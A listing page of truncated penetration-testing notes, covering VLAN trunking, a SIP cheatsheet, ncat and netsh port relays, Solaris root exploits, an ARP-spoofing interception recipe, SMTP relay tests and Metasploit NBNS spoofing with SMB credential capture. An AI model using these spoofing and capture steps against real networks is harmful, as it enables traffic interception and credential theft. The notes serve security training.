Latest notes for PenTesting - MrLeet

MrLeet provides materials allowing anyone to gain practical hands-on experience with digital security, computer applications and network administration tasks.

Configure an Ethernet interface as a VLAN trunk

Suppose that a host requires access to two VLANs, both carried by a trunk connected to physical interface eth0. The assigned IP addresses for the host are on VLAN 2 and on VLAN 3.

[+] First install the vlan packag...

Score: 0

VOIP (SIP) Cheatsheet

SIP usually uses port 5060 (TCP or UDP) for unencrypted signaling, or 5061 for encrypted transport using TLS.

SIP is an ASCII-based protocol that shares some elements with HTTP, using a Request/Response model. Much like an HTTP request from a browser, a SIP clie...

Score: 0

By: ajayverma 2019-06-25 11:35:26

Useful commands

[+] Remove text using sed

cat SSL_Hosts.txt | sed -r 's/\ttcp\t/:/g'

[+] Port forwarding using NCAT

ncat -lvkp 12345 -c "ncat --ssl 443"

[+] Windows 7 or later, build port relay

C:\> netsh interface portproxy add v4tov4 listenport=<LPORT> listenaddress=0.0.0...

Score: 0

Browser Addons

- Chrome:

Recx Security Analyser

- Firefox/Iceweasel:

Web Developer
Tamper Data
FoxyProxy Standard
User Agent Switcher

Score: 0

By: ajayverma 2019-06-25 11:35:32

[+] Solaris vulnerabilities:

Solaris 7:
sadmind_exec SADMIND - weakness in default security settings - allows root -
**ttyprompt TELNET - buffer overflow in solaris login - manual through telnet client
sendmail_exec LPD - line printer daemon buffer overflow - allows root
heap_noir ...

Score: 0

By: ajayverma 2019-06-25 11:35:35

1) Flip your machine into forwarding mode (as root):
echo "1" > /proc/sys/net/ipv4/ip_forward

2) Setup iptables to intercept HTTP requests (as root):
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

3) -l 8080 -f lock.ico

4) Run arpspoof to redirect traffic to your machine (as...

Score: 0

By: ajayverma 2019-06-25 11:35:38

[+] SMTP Open Relay Commands

[-] ncat -C 25
[-] HELO
[-] MAIL FROM: <>
[-] RCPT TO: <>
[-] DATA
Test Email...

Score: 0

By: ajayverma 2019-06-25 11:35:41

[+] Weak SSH Ciphers

sudo nano /etc/ssh/sshd_config

Add the following lines:

Ciphers aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,arcfour
MACs hmac-sha1,hmac-ripemd160

Restart SSH

[+] Unquoted Service Paths

Run Regedit and browse to HKLM\SYSTEM\CurrentControlSet\services
Find the service in question and simply add &...

Score: 0

By: ajayverma 2019-06-25 11:23:20

[+] NBNS Spoof / Capture

[>] NBNS Spoof
msf > use auxiliary/spoof/nbns/nbns_response
msf auxiliary(nbns_response) > show options
msf auxiliary(nbns_response) > set INTERFACE eth0
msf auxiliary(nbns_response) > set SPOOFIP
msf auxiliary(nbns_response) > run

[>] SMB Capture

msf > use auxiliary/server/...

Score: 0

By: ajayverma 2019-06-25 11:23:24
root@bt:~# nbtscan -r
Doing NBT name scan for addresses from

IP address       NetBIOS Name     Server    User      MAC address
------------------------------------------------------------------------------
Sendto failed: Permission denied <unknown> ...

Score: 0